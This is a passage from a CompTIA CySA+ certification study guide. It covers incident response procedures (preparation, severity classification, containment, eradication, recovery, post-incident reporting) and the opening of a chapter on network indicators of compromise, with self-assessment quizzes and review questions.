8. List at least one consideration when assigning a
level of criticality.
9. Match the following terms with their definitions.
10. Salaries of employees is considered
___________________________________
___________
Chapter 16. Applying the
Appropriate Incident
Response Procedure
This chapter covers the following topics related
to Objective 4.2 (Given a scenario, apply the
appropriate incident response procedure) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Preparation: Describes steps required to be
ready for an incident, including training, testing,
and documentation of procedures
• Detection and analysis: Covers detection
methods and analysis, exploring topics such as
characteristics contributing to severity level
classification, downtime, recovery time, data
integrity, economic impact, system process
criticality, reverse engineering, and data
correlation
• Containment: Identifies methods used to
separate and confine the damage, including
segmentation and isolation
• Eradication and recovery: Defines activities
that return the network to normal, including
vulnerability mitigation, sanitization,
reconstruction/reimaging, secure disposal,
patching, restoration or permissions,
reconstitution of resources, restoration of
capabilities and services, and verification of
logging/communication to security monitoring
• Post-incident activities: Identifies operations
that should follow incident recovery, including
evidence retention, lessons learned report, change
control process, incident response plan update,
incident summary report, IoC generation, and
monitoring
When a security incident occurs, there are usually several
possible responses. Choosing the correct response and
appropriately applying that response is a critical part of
the process. This second chapter devoted to the incident
response process presents the many considerations that
go into making the correct decisions regarding response.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 16-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 16-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the
incident response process?
a. Containment
b. Eradication and recovery
c. Preparation
d. Detection
2. Which of the following groups should receive
technical training on configuring and maintaining
security controls?
a. High-level management
b. Middle management
c. Technical staff
d. Employees
3. Which of the following characteristics of an
incident is a function of how widespread the
incident is?
a. Scope
b. Downtime
c. Data integrity
d. Indicator of compromise
4. Which of the following is the average time required
to repair a single resource or function?
a. RPO
b. MTD
c. MTTR
d. RTO
5. Which of the following processes involves limiting
the scope of an incident by leveraging existing
segments of the network as barriers to prevent the
spread to other segments?
a. Isolation
b. Segmentation
c. Containerization
d. Partitioning
6. How do you isolate a device at Layer 2 without
removing it from the network?
a. Port security
b. Isolation
c. Secured memory
d. Processor encryption
7. Which of the following includes removing data from
the media so that it cannot be reconstructed using
normal file recovery techniques and tools?
a. Destruction
b. Clearing
c. Purging
d. Buffering
8. Which of the following refers to removing all traces
of a threat by overwriting the drive multiple times
to ensure that the threat is removed?
a. Destruction
b. Clearing
c. Purging
d. Sanitization
9. Which of the following refers to behaviors and
activities that precede or accompany a security
incident?
a. IoCs
b. NOCs
c. IONs
d. SOCs
10. Which of the following is the first document that
should be drafted after recovery from an incident?
a. Incident summary report
b. Incident response plan
c. Lessons learned report
d. IoC document
FOUNDATION TOPICS
PREPARATION
When security incidents occur, the quality of the
response is directly related to the amount and the quality
of the preparation. Responders should be well prepared
and equipped with all the tools they need to provide a
robust response. Several key activities must be carried
out to ensure this is the case.
Training
The terms security awareness training, security
training, and security education are often used
interchangeably, but they are actually three different
things. Basically, security awareness training is the what,
security training is the how, and security education is the
why. Security awareness training reinforces the fact that
valuable resources must be protected by implementing
security measures. Security training teaches personnel
the skills they need to perform their jobs in a secure
manner. Organizations often combine security
awareness training and security training and label it as
“security awareness training” for simplicity; the
combined training improves user awareness of security
and ensures that users can be held accountable for their
actions. Security education is more independent,
targeted at security professionals who require security
expertise to act as in-house experts for managing the
security programs.
Security awareness training should be developed based
on the audience. In addition, trainers must understand
the corporate culture and how it will affect security. The
audiences you need to consider when designing training
include high-level management, middle management,
technical personnel, and other staff.
For high-level management, the security awareness
training must provide a clear understanding of potential
risks and threats, effects of security issues on
organizational reputation and financial standing, and
any applicable laws and regulations that pertain to the
organization’s security program. Middle management
training should discuss policies, standards, baselines,
guidelines, and procedures, particularly how these
components map to individual departments. Also,
middle management must understand their
responsibilities regarding security. Technical staff should
receive technical training on configuring and
maintaining security controls, including how to
recognize an attack when it occurs. In addition, technical
staff should be encouraged to pursue industry
certifications and higher education degrees. Other staff
need to understand their responsibilities regarding
security so that they perform their day-to-day tasks in a
secure manner. With these staff, providing real-world
examples to emphasize proper security procedures is
effective.
Personnel should sign a document that indicates they
have completed the training and understand all the
topics. Although the initial training should occur when
personnel are hired, security awareness training should
be considered a continuous process, with future training
sessions occurring at least annually.
Testing
After incident response processes have been developed
as described in Chapter 15, “The Incident Response
Process,” responders should test the process to ensure it
is effective. In Chapter 20, “Applying Security Concepts
in Support of Organizational Risk Mitigation,” you’ll
learn about exercises that can be performed that help to
test your response to a live attack (red team/blue
team/white team exercises and tabletop exercises). The
results of tests along with the feedback from live events
can help to inform the lesson learned report, described
later in this chapter.
Documentation of Procedures
Incident response procedures should be clearly
documented. While many incident response plan
templates can be found online (and even the outline of
this chapter is organized by one set of procedures), a
generally accepted incident response plan is shown in
Figure 16-1 and described in the list that follows.
Figure 16-1 Incident Response Process
Step 1. Detect: The first step is to detect the
incident. The worst sort of incident is one
that goes unnoticed.
Step 2. Respond: The response to the incident
should be appropriate for the type of incident.
A denial of service (DoS) attack against a web
server would require a quicker and different
response than a missing mouse in the server
room. Establish standard responses and
response times ahead of time.
Step 3. Report: All incidents should be reported
within a time frame that reflects the
seriousness of the incident. In many cases,
establishing a list of incident types and the
person to contact when each type of incident
occurs is helpful. Attention to detail at this
early stage, while time-sensitive information
is still available, is critical.
Step 4. Recover: Recovery involves a reaction
designed to make the network or system
affected functional again. Exactly what that
means depends on the circumstances and the
recovery measures available. For example, if
fault-tolerance measures are in place, the
recovery might consist of simply allowing one
server in a cluster to fail over to another. In
other cases, it could mean restoring the
server from a recent backup. The main goal of
this step is to make all resources available
again.
Step 5. Remediate: This step involves eliminating
any residual danger or damage to the network
that still might exist. For example, in the case
of a virus outbreak, it could mean scanning
all systems to root out any additional affected
machines. These measures are designed to
make a more detailed mitigation when time
allows.
Step 6. Review: Finally, you need to review each
incident to discover what can be learned from
it. Changes to procedures might be called for.
Share lessons learned with all personnel who
might encounter the same type of incident
again. Complete documentation and analysis
are the goals of this step.
The actual investigation of an incident occurs during the
respond, report, and recover steps. Following
appropriate forensic and digital investigation processes
during an investigation can ensure that evidence is
preserved.
You responses will benefit from using standard forms
that prompt for the collection of all relevant information
that can lead to a better and more consistent response
process over time. Some examples of commonly used
forms are as follows:
• Incident form: This form is used to describe the
incident in detail. It should include sections to
record complementary metal oxide semiconductor
(CMOS), hard drive information, image archive
details, analysis platform information, and other
details. The best approach is to obtain a template
and customize it to your needs.
• Call list/escalation list: First responders to an
incident should have contact information for all
individuals who might need to be alerted during
the investigation. This list should also indicate
under what circumstance these individuals should
be contacted to avoid unnecessary alerts and to
keep the process moving in an organized manner.
DETECTION AND ANALYSIS
Once evidence from an incident has been collected, it
must be analyzed and classified as to its severity so that
more critical incidents can be dealt with first and less
critical incidents later.
Characteristics Contributing to
Severity Level Classification
To properly prioritize incidents, each must be classified
with respect to the scope of the incident and the types of
data that have been put at risk. Scope is more than just
how widespread the incident is, and the types of data
classifications may be more varied than you expect. The
following sections discuss the factors that contribute to
incident severity and prioritization.
The scope determines the impact and is a function of
how widespread the incident is and the potential
economic and intangible impacts it could have on the
business. Five common factors are used to measure
scope. They are covered in the following sections.
Downtime and Recovery Time
One of the issues that must be considered is the potential
amount of downtime the incident could inflict and the
time it will take to recover from the incident. If a proper
business continuity plan (BCP) has been created, you will
have collected information about each asset that will help
classify incidents that affect each asset.
As part of determining how critical an asset is, you need
to understand the following terms:
• Maximum tolerable downtime (MTD): This
is the maximum amount of time that an
organization can tolerate a single resource or
function being down. This is also referred to as
maximum period time of disruption (MPTD).
• Mean time to repair (MTTR): This is the
average time required to repair a single resource
or function when a disaster or disruption occurs.
• Mean time between failures (MTBF): This is
the estimated amount of time a device will operate
before a failure occurs. This amount is calculated
by the device vendor. System reliability is
increased by a higher MTBF and lower MTTR.
• Recovery time objective (RTO): This is the
shortest time period after a disaster or disruptive
event within which a resource or function must be
restored in order to avoid unacceptable
consequences. RTO assumes that an acceptable
period of downtime exists. RTO should be smaller
than MTD.
• Work recovery time (WRT): This is the
difference between RTO and MTD, which is the
remaining time that is left over after the RTO
before reaching the MTD.
• Recovery point objective (RPO): This is the
point in time to which the disrupted resource or
function must be returned.
Each organization must develop its own documented
criticality levels. The following is a good example of
organizational resource and function criticality levels:
• Critical: Critical resources are those resources
that are most vital to the organization’s operation
and should be restored within minutes or hours of
the disaster or disruptive event.
• Urgent: Urgent resources should be restored
within 24 hours but are not considered as
important as critical resources.
• Important: Important resources should be
restored within 72 hours but are not considered as
important as critical or urgent resources.
• Normal: Normal resources should be restored
within 7 days but are not considered as important
as critical, urgent, or important resources.
• Nonessential: Nonessential resources should be
restored within 30 days.
Data Integrity
Data integrity refers to the correctness, completeness,
and soundness of the data. One of the goals of integrity
services is to protect the integrity of data or at least to
provide a means of discovering when data has been
corrupted or has undergone an unauthorized change.
One of the challenges with data integrity attacks is that
the effects might not be detected for years—until there is
a reason to question the data. Identifying the
compromise of data integrity can be made easier by
using file-hashing algorithms and tools to check seldomused but sensitive files for unauthorized changes after an
incident. These tools can be run to quickly identify files
that have been altered. They can help you get a better
assessment of the scope of the data corruption.
Economic
The economic impact of an incident is driven mainly by
the value of the assets involved. Determining those
values can be difficult, especially for intangible assets
such as plans, designs, and recipes. Tangible assets
include computers, facilities, supplies, and personnel.
Intangible assets include intellectual property, data, and
organizational reputation. The value of an asset should
be considered with respect to the asset owner’s view. The
following considerations can be used to determine an
asset’s value:
• Value to owner
• Work required to develop or obtain the asset
• Costs to maintain the asset
• Damage that would result if the asset were lost
• Cost that competitors would pay for the asset
• Penalties that would result if the asset were lost
After determining the value of assets, you should
determine the vulnerabilities and threats to each asset.
System Process Criticality
Some assets are not actually information but systems
that provide access to information. When these system
or groups of systems provide access to data required to
continue to do business, they are called critical systems.
While it is somewhat simpler to arrive at a value for
physical assets such as servers, routers, switches, and
other devices, in cases where these systems provide
access to critical data or are required to continue a
business-critical process, their value is more than the
replacement cost of the hardware. The assigned value
should be increased to reflect its importance in providing
access to data or its role in continuing a critical process.
Reverse Engineering
Reverse engineering can refer to retracing the steps
in an incident, as seen from the logs in the affected
devices or in logs of infrastructure devices that may have
been involved in transferring information to and from
the devices. This can help you understand the sequence
of events. When unknown malware is involved, the term
reverse engineering may refer to an analysis of the
malware’s actions to determine a removal technique.
This is the approach to zero-day attacks in which no
known fix is yet available from anti-malware vendors.
With respect to reverse engineering malware, this
process refers to extracting the code from the binary
executable to identify how it was programmed and what
it does. There are three ways the binary malware file can
be made readable:
• Disassembly: This refers to reading the machine
code into memory and then outputting each
instruction as a text string. Analyzing this output
requires a very high level of skill and special
software tools.
• Decompiling: This process attempts to
reconstruct the high-level language source code.
• Debugging: This process steps though the code
interactively. There are two kinds of debuggers:
• Kernel debugger: This type of debugger
operates at ring 0 (essentially the driver level)
and has direct access to the kernel.
• Usermode debugger: This type of debugger
has access to only the usermode space of the
operating system. Most of the time, this is
enough, but not always. In the case of rootkits
or even super-advanced protection schemes, it
is preferable to step into a kernel mode
debugger instead because usermode in such
situations is untrustworthy.
Data Correlation
Data correlation is the process of locating variables in
the information that seem to be related. For example, say
that every time there is a spike in SYN packets, you seem
to have a DoS attack. When you apply these processes to
the data in security logs of devices, it helps you identify
correlations that help you identify issues and attacks. A
good example of such a system is a security information
event management (SIEM) system. These systems collect
the logs, analyze the logs, and, through the use of
aggregation and correlation, help you identify attacks
and trends. SIEM systems are covered in more detail in
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
CONTAINMENT
Just as the first step when an injury occurs is to stop the
bleeding, after a security incident occurs, the first
priority is to contain the threat to minimize the damage.
There are a number of containment techniques. Not all
of them are available to you or advisable in all situations.
One of the benefits of proper containment is that it gives
you time to develop a good remediation strategy.
Segmentation
The segmentation process involves limiting the scope
of an incident by leveraging existing segments of the
network as barriers to prevent the spread to other
segments. These segments could be defined at either
Layer 3 or Layer 2 of the OSI reference model.
When you segment at Layer 3, you are creating barriers
based on IP subnets. These are either physical LANs or
VLANs. Creating barriers at this level involves deploying
access control lists (ACLs) on the routers to prevent
traffic from moving from one subnet to another. While it
is possible to simply shut down a router interface, in
some scenarios that is not advisable because the
interface is used to reach more subnets than the one
where the threat exists.
Segmenting at Layer 2 can be done in several ways:
• You can create VLANs, which create segmentation
at both Layer 2 and Layer 3.
• You can create private VLANs (PVLANs), which
segment an existing VLAN at Layer 2.
• You can use port security to isolate a device at
Layer 2 without removing it from the network.
In some cases, it might be advisable to use segmentation
at the perimeter of the network (for example, stopping
the outbound communication from an infected machine
or blocking inbound traffic).
Isolation
Isolation typically is implemented by either blocking all
traffic to and from a device or devices or by shutting
down device interfaces. This approach works well for a
single compromised system but becomes cumbersome
when multiple devices are involved. In that case,
segmentation may be a more advisable approach. If a
new device can be set up to perform the role of the
compromised device, the team may leave the device
running to analyze the end result of the threat on the
isolated host.
Another form of isolation, process isolation is a
technique whereby all processes (work being performed
by the processor) are executed using memory dedicated
to each process. This prevents processes from accessing
the memory of other processes, which can help to
mitigate attacks that do so.
ERADICATION AND
RECOVERY
After the threat has been contained, the next step is to
remove or eradicate the threat. In some cases the
compromised device can be cleaned without a format of
the hard drive, while in many other cases this must be
done to completely remove the threat. This section looks
at some removal approaches.
Vulnerability Mitigation
Once the specific vulnerability has been identified, it
must be mitigated. This mitigation will in large part be
driven by the type of issue with which you are presented.
In some cases the proper response will be to format the
hard drive of the affected system and reimage it. In other
cases the mitigation may be a change in policies, when a
weakness is revealed that results from the way the
organization operates. Let’s look at some common
mitigations.
Sanitization
Sanitization refers to removing all traces of a threat by
overwriting the drive multiple times to ensure that the
threat is removed. This works well for mechanical hard
disk drives, but solid-state drives present a challenge in
that they cannot be overwritten. Most solid-state drive
vendors provide sanitization commands that can be used
to erase the data on the drive. Security professionals
should research these commands to ensure that they are
effective.
Note
NIST Special Publication 800-88 Rev. 1 is an example of a government
guideline for proper media sanitization, as are the IRS guidelines for proper
media sanitization:
• https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.80088r1.pdf
• https://www.irs.gov/privacy-disclosure/media-sanitization-guidelines
Reconstruction/Reimaging
Once a device has been sanitized, the system must be
rebuilt. This can be done by reinstalling the operating
system, applying all system updates, reinstalling the
anti-malware software, and implementing any
organization security settings. Then, any needed
applications must be installed and configured. If the
device is a server that is running some service on behalf
of the network (for example, DNS or DHCP), that service
must be reconfigured as well. All this is not only a lot of
work, it is time-consuming. A better approach is to
maintain standard images of the various device types in
the network so that you can use these images to stand up
a device quickly. To make this approach even more
seamless, having a backup image of the same device
eliminates the need to reconfigure everything you might
have to reconfigure when using standard images.
Secure Disposal
In some instances, you may decide to dispose of a
compromised device (or its storage drive) rather than
attempt to sanitize and reuse the device. In that case, you
want to dispose of it in a secure manner. In the case of
secure disposal, an organization must consider certain
issues, including the following:
• Does removal or replacement introduce any
security holes in the network?
• How can the system be terminated in an orderly
fashion to avoid disrupting business continuity?
• How should any residual data left on any systems
be removed?
• Are there any legal or regulatory issues that would
guide the destruction of data?
Whenever data is erased or removed from a storage
media, residual data can be left behind. This can allow
data to be reconstructed when the organization disposes
of the media, and unauthorized individuals or groups
may be able to gain access to the data. When considering
data remanence, security professionals must understand
three countermeasures:
• Clearing: Clearing includes removing data from
the media so that it cannot be reconstructed using
normal file recovery techniques and tools. With
this method, the data is recoverable only using
special forensic techniques.
• Purging: Also referred to as sanitization, purging
makes the data unreadable even with advanced
forensic techniques. With this technique, data
should be unrecoverable.
• Destruction: Destruction involves destroying
the media on which the data resides. Degaussing,
another destruction technique, exposes the media
to a powerful, alternating magnetic field,
removing any previously written data and leaving
the media in a magnetically randomized (blank)
state. Physical destruction involves physically
breaking the media apart or chemically altering it.
Patching
In many cases, a threat or an attack is made possible by
missing security patches. You should update or at least
check for updates for a variety of components. This
includes all patches for the operating system, updates for
any applications that are running, and updates to all
anti-malware software that is installed. While you are at
it, check for any firmware update the device may require.
This is especially true of hardware security devices such
as firewalls, IDSs, and IPSs. If any routers or switches
are compromised, check for software and firmware
updates.
Restoration of Permissions
Many times an attacker compromises a device by altering
the permissions, either in the local database or in entries
related to the device in the directory service server. All
permissions should undergo a review to ensure that all
are in the appropriate state. The appropriate state may
not be the state they were in before the event. Sometimes
you may discover that although permissions were not set
in a dangerous way prior to an event, they are not
correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You
should also make changes to the permissions based on
lessons learned during an event. In that case, ensure that
the new settings undergo a change control review and
that any approved changes are reflected in the
configuration database.
Reconstitution of Resources
In many incidents, resources may be deleted or stolen. In
other cases, the process of sanitizing the device causes
the loss of information resources. These resources should
be recovered from backup. One key process that can
minimize data loss is to shorten the time between
backups for critical resources. This results in a recovery
point objective (RPO) that includes more recent data.
RPO is discussed in more detail earlier in this chapter.
Restoration of Capabilities and
Services
During the incident response, it might be necessary to
disrupt some of the normal business processes to help
contain the issue or to assist in remediation. It is also
possible that the attack has rendered some services and
capabilities unavailable. Once an effective response has
been mounted, these systems and services must be
restored to full functionality. As shortening the backup
time can help to reduce the effects of data loss, faulttolerant measures can be effective in preventing the loss
of critical services.
Verification of
Logging/Communication to Security
Monitoring
To ensure that you will have good security data going
forward, you need to ensure that all logs related to
security are collecting data. Pay special attention to the
manner in which the logs react when full. With some
settings, the log begins to overwrite older entries with
new entries. With other settings, the service stops
collecting events when the log is full. Security log entries
need to be preserved. This may require manual archiving
of the logs and subsequent clearing of the logs. Some logs
make this possible automatically, whereas others require
a script. If all else fails, check the log often to assess its
state.
Many organizations send all security logs to a central
location. This could be a Syslog server, or it could be a
SIEM system. These systems not only collect all the logs,
they use the information to make inferences about
possible attacks. Having access to all logs allows the
system to correlate all the data from all responding
devices.
Regardless of whether you are logging to a Syslog server
or a SIEM system, you should verify that all
communications between the devices and the central
server are occurring without a hitch. This is especially
true if you had to rebuild the system manually rather
than restore from an image, as there would be more
opportunity for human error in the rebuilding of the
device.
POST-INCIDENT ACTIVITIES
Once the incident has been contained and removed and
the recovery process is complete, there is still work to be
done. Much of it, as you might expect, is paperwork, but
this paperwork is critical to enhancing the response to
the next incident. Let’s look at some of these postincident activities that should take place.
Evidence Retention
If the incident involved a security breach and the
incident response process gathered evidence to prove an
illegal act or a violation of policy, the evidence must be
stored securely until it is presented in court or is used to
confront the violating employee. Computer
investigations require different procedures than regular
investigations because the time frame for the computer
investigator is compressed, and an expert might be
required to assist in the investigation. Also, computer
information is intangible and often requires extra care to
ensure that the data is retained in its original format.
Finally, the evidence in a computer crime is difficult to
gather.
After a decision has been made to investigate a computer
crime, you should follow standardized procedures,
including the following:
• Identify what type of system is to be seized.
• Identify the search and seizure team members.
• Determine the risk of the suspect destroying
evidence.
After law enforcement has been informed of a computer
crime, the constraints on the organization’s investigator
are increased. Turning over an investigation to law
enforcement to ensure that evidence is preserved
properly might be necessary.
When investigating a computer crime, evidentiary rules
must be addressed. Computer evidence should prove a
fact that is material to the case and must be reliable. The
chain of custody must be maintained. Computer
evidence is less likely to be admitted in court as evidence
if the process for producing it is not documented.
Lessons Learned Report
The first document that should be drafted is a lessons
learned report, which briefly lists and discusses what
was learned about how and why the incident occurred
and how to prevent it from occurring again. This report
should be compiled during a formal meeting shortly after
recovery from the incident. This report provides valuable
information that can be used to drive improvement in
the security posture of the organization. This report
might answer questions such as the following:
• What went right, and what went wrong?
• How can we improve?
• What needs to be changed?
• What was the cost of the incident?
Change Control Process
The lessons learned report may generate a number of
changes that should be made to the network
infrastructure. All these changes, regardless of how
necessary they are, should go through the standard
change control process. They should be submitted to the
change control board, examined for unforeseen
consequences, and studied for proper integration into
the current environment. Only after gaining approval
should they be implemented. You may find it helpful to
create a “fast track” for assessment in your change
management system for changes such as these when
time is of the essence. For more details regarding change
control processes, refer to Chapter 8, “Security Solutions
for Infrastructure Management.”
Incident Response Plan Update
The lessons learned exercise may also uncover flaws in
your IR plan. If this is the case, you should update the
plan appropriately to reflect the needed procedure
changes. When this is complete, ensure that all software
and hard copy versions of the plan have been updated so
everyone is working from the same document when the
next event occurs.
Incident Summary Report
All stakeholders should receive a document that
summarizes the incident. It should not have an excessive
amount of highly technical language in it, and it should
be written so nontechnical readers can understand the
major points of the incident. The following are some of
the highlights that should be included in an incident
summary report:
• When the problem was first detected and by whom
• The scope of the incident
• How it was contained and eradicated
• Work performed during recovery
• Areas where the response was effective
• Areas that need improvement
Indicator of Compromise (IoC)
Generation
Indicators of compromise (IoCs) are behaviors and
activities that precede or accompany a security incident.
In Chapter 17, “Analyzing Potential Indicators of
Compromise,” you will learn what some of these
indicators are and what they may tell you. You should
always record or generate the IOCs that you find related
to the incident. This information may be used to detect
the same sort of incident later, before it advances to the
point of a breach.
Monitoring
As previously discussed, it is important to ensure that all
security surveillance tools (IDS, IPS, SIEM, firewalls) are
back online and recording activities and reporting as
they should be, as discussed in Chapter 11. Moreover,
even after you have taken all steps described thus far,
consider using a vulnerability scanner to scan the devices
or the network of devices that were affected. Make sure
before you do so that you have updated the scanner so it
can recognize the latest vulnerabilities and threats. This
will help catch any lingering vulnerabilities that may still
be present.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 16-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 16-2 Key Topics for Chapter 16
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
incident form
call list/escalation list
scope
maximum tolerable downtime (MTD)
mean time to repair (MTTR)
mean time between failures (MTBF)
recovery time objective (RTO)
work recovery time (WRT)
recovery point objective (RPO)
reverse engineering
disassembly
decompiling
debugging
kernel debugger
usermode debugger
data correlation
segmentation
isolation
sanitization
clearing
purging
destruction
lessons learned report
incident summary report
indicator of compromise (IoC)
REVIEW QUESTIONS
1. When security incidents occur, the quality of the
response is directly related to the amount of and
quality of the ____________.
2. List the steps, in order, of the incident response
process.
3. Match the following terms with their definitions.
4. ____________________ involves eliminating
any residual danger or damage to the network that
still might exist.
5. List at least two considerations that can be used to
determine an asset’s value.
6. Match the following terms with their definitions.
7. The _______________________ should
indicate under what circumstance individuals
should be contacted to avoid unnecessary alerts
and to keep the process moving in an organized
manner.
8. List at least one way the binary malware file can be
made readable.
9. Match the following terms with their definitions.
10. ______________________ are behaviors and
activities that precede or accompany a security
incident.
Chapter 17. Analyzing
Potential Indicators of
Compromise
This chapter covers the following topics related
to Objective 4.3 (Given an incident, analyze
potential indicators of compromise) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Network-related indicators of compromise:
Includes bandwidth consumption, beaconing,
irregular peer-to-peer communication, rogue
device on the network, scan/sweep, unusual
traffic spike, and common protocol over nonstandard port
• Host-related indicators of compromise:
Covers processor consumption, memory
consumption, drive capacity consumption,
unauthorized software, malicious process,
unauthorized change, unauthorized privilege, data
exfiltration, abnormal OS process behavior, file
system change or anomaly, registry change or
anomaly, and unauthorized scheduled task
• Application-related indicators of
compromise: Includes anomalous activity,
introduction of new accounts, unexpected output,
unexpected outbound communication, service
interruption, and application log
Indicators of compromise (IOCs) are somewhat
like clues left at the scene of a crime except they also
include clues that preceded the crime. IOCs help us to
anticipate security issues and also to reconstruct the
process that was taken to cause the security issue or
breach. This chapter examines some common IOCs and
what they might indicate.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 17-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 17-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following IoCs is most likely from a
DoS attack?
a. Beaconing
b. Irregular peer-to-peer communication
c. Bandwidth consumption
d. Rogue device on the network
2. Which of the following IoCs is most likely an
indication of a botnet?
a. Beaconing
b. Irregular peer-to-peer communication
c. Bandwidth consumption
d. Rogue device on the network
3. Which of the following is used to locate live
devices?
a. Ping sweep
b. Port scan
c. Pen test
d. Vulnerability test
4. Which of the following metrics cannot be found in
Windows Task Manager?
a. Memory consumption
b. Drive capacity consumption
c. Processor consumption
d. Unauthorized software
5. Which of the following utilities is a freeware task
manager that offers more functionality than
Windows Task Manager?
a. System Information
b. Process Explorer
c. Control Panel
d. Performance
6. Which of the following is a utility built into the
Windows 10 operating system that checks for
system file corruption?
a. TripWire
b. System File Checker
c. sigver
d. SIEM
7. Which of the following might be an indication of a
backdoor?
a. Introduction of new accounts
b. Unexpected output
c. Unexpected outbound communication
d. Anomalous activity
8. Within which of the following tools is the
Application log found?
a. Event Viewer
b. Performance
c. System Information
d. App Locker
9. Which of the following is not an application-related
IoC?
a. Introduction of new accounts
b. Unexpected output
c. Unexpected outbound communication
d. Beaconing
FOUNDATION TOPICS
NETWORK-RELATED
INDICATORS OF
COMPROMISE
Security analysts, regardless of whether they are
operating in the role of first responder or in a supporting
role analyzing issues, should be aware of common
indicators of compromise. Moreover, they should be
aware of the types of incidents implied by each IOC. This
can lead to a quicker and correct choice of action when
time is of the essence. It is helpful to examine these IOCs
in relation to the component that is displaying the IOC.
Certain types of network activity are potential indicators
of security issues. The following sections describe the
most common of the many network-related symptoms.
Bandwidth Consumption
Whenever bandwidth usage is above normal and there is
no known legitimate activity generating the traffic, you
should suspect security issues that generate unusual
amounts of traffic, such as denial-of-service (DoS) or
distributed denial-of-service (DDoS) attacks. For this
reason, benchmarks should be created for normal
bandwidth usage at various times during the day. Then
alerts can be set when activity rises by a specified
percentage at those various times. Many free network
bandwidth monitoring tools are available. Among them
are BitMeter OS, FreeMeter Bandwidth Monitor,
BandwidthD, and PRTG Network Monitor. Anomalybased intrusion detection systems can also “learn”
normal traffic patterns and can set off alerts when
unusual traffic is detected. Figure 17-1 shows an example
of setting an alert in BitMeter.
Figure 17-1 Setting an Alert in BitMeter
Beaconing
Beaconing refers to traffic that leaves a network at
regular intervals. This type of traffic could be generated
by compromised hosts that are attempting to
communicate with (or call home) the malicious party
that compromised the host. While there are security
products that can identify beacons, including firewalls,
intrusion detection systems, web proxies, and SIEM
systems, creating and maintaining baselines of activity
will help you identify beacons that are occurring during
times of no activity (for example, at night). When this
type of traffic is detected, you should search the local
source device for scripts that may be generating these
calls home.
Irregular Peer-to-Peer
Communication
If traffic occurring between peers within a network is
normal but communications are irregular, this may be an
indication of a security issue. At the very least, illegal file
sharing could be occurring, and at the worst, this peerto-peer (P2P) communication could be the result of a
botnet. Peer-to-peer botnets differ from normal botnets
in their structure and operation. Figure 17-2 shows the
structure of a traditional botnet. In this scenario, all
the zombies communicate directly with the command
and control server, which is located outside the network.
The limitation of this arrangement and the issue that
gives rise to peer-to-peer botnets is that devices that are
behind a NAT server or proxy server cannot participate.
Only devices that can be reached externally can do so.
Figure 17-2 Traditional Botnet
In a peer-to-peer botnet, devices that can be reached
externally are compromised and run server software that
turns them into command and control servers for the
devices that are recruited internally that cannot
communicate with the command and control server
operating externally. Figure 17-3 shows this
arrangement.
Figure 17-3 Peer-to-Peer Botnet
Regardless of whether peer-to-peer traffic is used as part
of a botnet or simply as a method of file sharing, it
presents the following security issues:
• The spread of malicious code that may be shared
along with the file
• Inadvertent exposure of sensitive material located
in unsecured directories
• Actions taken by the P2P application that make a
device more prone to attack, such as opening
ports
• Network DoS attacks created by large downloads
• Potential liability from pirated intellectual
property
Because of the dangers, many organizations choose to
prohibit the use of P2P applications and block common
port numbers used by these applications at the firewall.
Another helpful remediation is to keep all anti-malware
software up to date in case malware is transmitted by the
use of P2P applications.
Rogue Device on the Network
Any time new devices appear on a network, there should
be cause for suspicion. While it is possible that users may
be introducing these devices innocently, there are also a
number of bad reasons for these devices to be on the
network. The following types of illegitimate devices may
be found on a network:
• Wireless key loggers: These collect
information and transmit it to the criminal via
Bluetooth or Wi-Fi.
• Wi-Fi and Bluetooth hacking gear: This gear
is designed to capture both Bluetooth and Wi-Fi
transmissions.
• Rogue access points: Rogue APs are designed
to lure your hosts into a connection for a peer-topeer attack.
• Rogue switches: These switches can attempt to
create a trunk link with a legitimate switch, thus
providing access to all VLANs.
• Mobile hacking gear: This gear allows a
malicious individual to use software along with
software-defined radios to trick cell phone users
into routing connections through a fake cell tower.
The actions required to detect or prevent rogue
devices depend on the type of device. With respect to
rogue switches, ensure that all ports that are required to
be trunks are “hard coded” as trunks and that Dynamic
Trunking Protocol (DTP) is disabled on all switch ports.
With respect to rogue wireless access points, the best
solution is a wireless intrusion prevention system
(WIPS). These systems can not only alert you when any
unknown device is in the area (APs and stations) but can
take a number of actions to prevent security issues,
including the following:
• Locate a rogue AP by using triangulation when
three or more sensors are present
• Deauthenticate any stations that have connected
to an “evil twin”
• Detect denial-of-service attacks
• Detect man-in-the-middle and clientimpersonation attacks
Some examples of these tools include Mojo Networks
AirTight WIPS, HP RFProtect, Cisco Adaptive Wireless
IPS, Fluke Networks AirMagnet Enterprise, HP Mobility
Security IDS/IPS, and Zebra Technologies AirDefense.
Scan/Sweep
One of the early steps in a penetration test is to scan or
sweep the network. If no known penetration test is under
way but a scan or sweep is occurring, it is an indication
that a malicious individual may be scanning in
preparation for an attack. The following are the most
common of these scans:
• Ping sweeps: Also known as ICMP sweeps, ping
sweeps use ICMP to identify all live hosts by
pinging all IP addresses in the known network. All
devices that answer are up and running.
